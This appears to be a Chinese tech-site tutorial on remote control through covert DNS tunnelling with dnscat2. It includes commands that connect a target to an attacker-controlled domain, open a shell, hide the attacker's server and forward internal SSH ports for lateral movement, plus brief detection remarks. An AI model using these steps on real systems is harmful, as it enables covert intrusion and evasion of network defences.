您当前的位置:首页 > 电脑百科 > 网络技术 > 网络技术

利用DNS隐蔽通信远控目标

时间:2020-05-11 11:48:19  来源:  作者:

DNS基础介绍

定义

域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程,域名的解析工作由DNS服务器完成

Dnscat2

dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成

场景

一般防火墙不会阻断,应用在防火墙上对其它流量封禁的场景

Dnscat2测试

Dnscat2测试-下载安装

本次以dnscat2工具测试远控目标主机,下载安装方式如下,分为客户端和服务端,服务端是攻击机器,测试使用攻击者控制的vps,客户端是被控端,即控制的目标。

Server:
# yum install rubygems
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
Client:
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/client
# make

Dnscat2测试-服务端

以ruby执行dnscat2.rb,默认执行有个默认秘钥,也可以用-c参数手动指定

利用DNS隐蔽通信远控目标

 

Dnscat2测试-客户端

指定连接服务端,--secret指定与上述秘钥一致

利用DNS隐蔽通信远控目标

 

Dnscat2测试-会话建立

当客户端执行时会话建立,利用help命令可以查看帮助,sessions命令可以查看建立的会话

利用DNS隐蔽通信远控目标

 

session -i 可以进入会话,进入会话后help可查看对应的操作

利用DNS隐蔽通信远控目标

 

Dnscat2测试-命令执行

1、在进入会话后输入shell执行命令,这时会提示shell session created,即新建了一个shell会话。

2、Ctrl+Z退出当前会话,通过sessions命令查看会话信息,再次利用session -i 进入新建的shell会话,即可执行shell命令

利用DNS隐蔽通信远控目标

 

Dnscat2测试-通信流量

利用wireshark查看终端通信流量,走的DNS协议,可以看到直接跟攻击者ip通信

利用DNS隐蔽通信远控目标

 

DNS隧道

通过上面基本测试,可以看到特征明显,很容易被检测发现,上文提到默认的 dnscat 查询中包含了dnscat 字符串,这个可以作为防火墙和入侵检测的特征,此外由于被控终端是直接指定的外联dns解析服务器IP,导致攻击者机器暴露,只需要防火墙上限制只允许与受信任的 DNS 服务器通信即可防范。

这节我们介绍另一种利用方式,dns隧道。

DNS隧道

1、DNS 隧道是 C&C 常用的通信方式,一般常用的编码方式 Base64、Binary、Hex 编码等,请求的 Type 一般为 TXT(为了返回的时候能够加入更多的信息),payload 部分一般为子域名

2、根据木马工作原理的不同,将 DNS隧道细分为IP直连型和域名型

上述介绍的其实就是IP直连型,下图为域名型dns隧道,典型的特征是受控终端DNS请求会先发往本地dns服务器解析,然后本地dns服务器再向外解析,最终找到攻击者控制的dns服务器,进而很好的保护了攻击者控制的dns服务端,从受害者终端流量只能看到受害终端与本地dns服务器的流量

利用DNS隐蔽通信远控目标

域名型DNS隧道

DNS隧道测试

1、首先需要自己注册一个域名,笔者在阿里云买的,有便宜的几块钱1年,然后配置NS记录和A记录,域名解析服务器直接用的就是vps IP

利用DNS隐蔽通信远控目标

 

2、服务端运行dnscat2,这是指向的是域名而不是前面测试直接写的ip,客户端一样

Server:ruby ./dnscat2.rb c.xxxxxx.top -e open -c 123456 --no-cache
Client:./dnscat --secret=123456 c.xxxxxx.top
利用DNS隐蔽通信远控目标

服务端


利用DNS隐蔽通信远控目标

客户端

dnscat2参数定义:

-c 参数定义了 pre-shared secret,可以使用具有预共享密钥的身份验证来防止中间人(man-in-the-middle)攻击,否则传输数据并未加密,有可能被监听网络流量的第三方还原;如果不加定义,Dnscat2会生成一个字符串,记得拷贝下来在启动客户端时使用。

-e 参数可以规定安全级别, open 代表让客户端进行选择。

--no-cache 请务必在运行服务器时添加无缓存选项,因为 powershell-dnscat2 客户端与 dnscat2 服务器的 caching 模式不兼容。

DNS隧道流量

通过这种方式再看终端通信流量,发现目的IP就不是攻击者域名服务器ip了,而是本地域名服务器ip,很好的隐藏了攻击者机器,同时域名请求记录中也没有了dnscat关键字。

利用DNS隐蔽通信远控目标

 

DNS Tunnel利用

这节讲下dns tunnel利用,当上述远控连接建立成功后,可以利用dns tunnel进一步对目标内网实施攻击。

1、在shell会话里查看目标ip,可以看到存在内网10段,当前主机为10.0.0.10,利用arp 命令可以看到内网段还存在其它主机,例如10.0.0.30

利用DNS隐蔽通信远控目标

 

2、回到command会话,可以看到listen命令,利用listen命令将内网段主机端口22转发到攻击者vps本地6666

利用DNS隐蔽通信远控目标

 

3、在vps本地连接转发出来的端口6666即可访问到目标内网的其它主机

利用DNS隐蔽通信远控目标

 

小结

实战中由于防护墙防护,利用DNS实施远控的场景很多,像典型的APT攻击中经常可见,关于DNS流量监测与阻断任重而道远。引用网上的一篇文章《从OilRig APT攻击分析恶意DNS流量阻断在企业安全建设中的必要性》。地址:https://mp.weixin.qq.com/s/dMbhTDLrXpBsVpPwdsDRrQ



Tags:DNS   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
写一个shell获取本机ip地址、网关地址以及dns信息。经常会遇到取本机ip、网关、dns地址,windows一个命令ipconfig /all全部获取到,但linux系统却并非如此。linux系统都自带ifc...【详细内容】
2021-12-27  Tags: DNS  点击:(2)  评论:(0)  加入收藏
域名系统是最重要的互联网服务之一,没有它,我们将无法访问在线内容,甚至无法发送电子邮件。每当我们尝试连接到其他网站或在线服务时,根 DNS 服务器都会帮助我们的计算机找到并...【详细内容】
2021-11-25  Tags: DNS  点击:(35)  评论:(0)  加入收藏
导读:在日常使用电脑浏览网页时,突然无法连接网络,但是QQ等软件却能正常使用,即便是重启电脑和路由器都解决不了,这种问题很大程度上就是DNS错误,比如说DNS服务器无响应,那么当遇到...【详细内容】
2021-10-15  Tags: DNS  点击:(98)  评论:(0)  加入收藏
Dog是一个用于DNS查询的命令行工具,它的工作原理类似于dig。它具有丰富多彩的输出,支持DNS-over-TLS 和 DNS-over-HTTPS协议,并且可以输出JSON格式。 系统环境Ubunt...【详细内容】
2021-09-02  Tags: DNS  点击:(70)  评论:(0)  加入收藏
如何清除您的 电脑的DNS 缓存 1.开始键+r开始键+R(Win+R) 2.输入:cmd 3.输入:ipconfig /flushdns...【详细内容】
2021-08-25  Tags: DNS  点击:(52)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  Tags: DNS  点击:(66)  评论:(0)  加入收藏
域名解析是客户端访问系统的第一步。在架构设计中,DNS Server除了解析域名,还能干点什么呢?又有哪些“挖坑”的用法需要避免呢?典型的互联网架构中,我们通过nginx的反向代理来做...【详细内容】
2021-07-29  Tags: DNS  点击:(264)  评论:(0)  加入收藏
DNS系统的作用DNS系统在网络中的作用就是维护着一个地址数据库,其中记录了各种主机域名与IP地址的对应关系,以便为客户程序提供正向或反向的地址查询服务,即正向解析与反向解...【详细内容】
2021-06-10  Tags: DNS  点击:(113)  评论:(0)  加入收藏
摘要: 发送大量的数据包消耗目标主机资源,使其无法正常工作。1.前言:DOS攻击原理:发送大量的数据包消耗目标主机资源,使其无法正常工作。DNS放大攻击的原理:伪造DNS数据包,向DNS服...【详细内容】
2021-04-15  Tags: DNS  点击:(219)  评论:(0)  加入收藏
作者:Draven 面向信仰编程为什么这么设计(Why’s THE Design)是一系列关于计算机领域中程序设计决策的文章,我们在这个系列的每一篇文章中都会提出一个具体的问题并从不同...【详细内容】
2021-04-13  Tags: DNS  点击:(234)  评论:(0)  加入收藏
▌简易百科推荐
写一个shell获取本机ip地址、网关地址以及dns信息。经常会遇到取本机ip、网关、dns地址,windows一个命令ipconfig /all全部获取到,但linux系统却并非如此。linux系统都自带ifc...【详细内容】
2021-12-27  K佬食古    Tags:shell   点击:(2)  评论:(0)  加入收藏
步骤1、配置 /etc/sysconfig/network-scripts/ifcfg-eth0 里的文件。it动力的CentOS下的ifcfg-eth0的配置详情:[root@localhost ~]# vim /etc/sysconfig/network-scripts/ifc...【详细内容】
2021-12-24  忆梦如风    Tags:网卡   点击:(10)  评论:(0)  加入收藏
1、查找当前目录下所有以.tar结尾的文件然后移动到指定目录find . -name “*.tar” -execmv {}./backup/ ;注解:find –name 主要用于查找某个文件名字,-exec 、xargs可...【详细内容】
2021-12-17  郭主任    Tags:运维   点击:(20)  评论:(0)  加入收藏
对于经常上网的朋友来说,除了手机购物上网,pc端玩网页游戏还是很多小伙伴首选的,但是有时候明明宽带链接上了,打开浏览器却出现上不了网的现象,下面小编要来跟大家说说电脑有网络...【详细内容】
2021-12-16  小白系统    Tags:网页无法打开   点击:(28)  评论:(0)  加入收藏
在访问像github、gitlab这样的外国网站时,很有可能会出现页面加载不出来或找不到页面的错误。这时候有的朋友就会以为是网络的问题,于是把Wifi断掉连上自己手机的热点,结果却还...【详细内容】
2021-12-15  启施技术IT狼叔    Tags:外网   点击:(16)  评论:(0)  加入收藏
网络地址来源:获取公网IP地址 https://ipip.yy.com/get_ip_info.phphttp://pv.sohu.com/cityjson?ie=utf-8http://www.ip168.com/json.do?view=myipaddress...【详细内容】
2021-12-15  韦廷华12    Tags:外网ip   点击:(15)  评论:(0)  加入收藏
准备好软件IPOP、用ENSP模拟一下华为交换机 启动交换机 <Huawei>sysEnter system view, return user view with Ctrl+Z.[Huawei]sysname FTPClient[FTPClient]interface vla...【详细内容】
2021-12-15  思源Edward    Tags:交换机   点击:(24)  评论:(0)  加入收藏
我们经常用到netstat命令查看主机连接状况,包括连接ip、端口、状态等,今天就练习下shell分析netsat结果。描述假设netstat命令运行的结果我们存储在nowcoder.txt里,格式如下:Pro...【详细内容】
2021-12-14  K佬食古    Tags:netstat   点击:(19)  评论:(0)  加入收藏
什么是滑动窗口?窗口是操作系统开辟的一块缓存空间,发送方在收到接收方ACK应答之前,必须在缓冲区保留已发送的数据,如果按期收到确认应答,数据就可以从缓冲区移除。什么是滑动窗...【详细内容】
2021-12-14  DifferentJava    Tags:TCP   点击:(30)  评论:(0)  加入收藏
概述日常管理华为路由设备过程中,难为会忘记设备登录密码,那么该如何重置设备登录密码吗?本期文章将全面向各位小伙伴总结分享。重置华为设备登录密码思路先行 采用console登录...【详细内容】
2021-12-10  onme0    Tags:   点击:(27)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条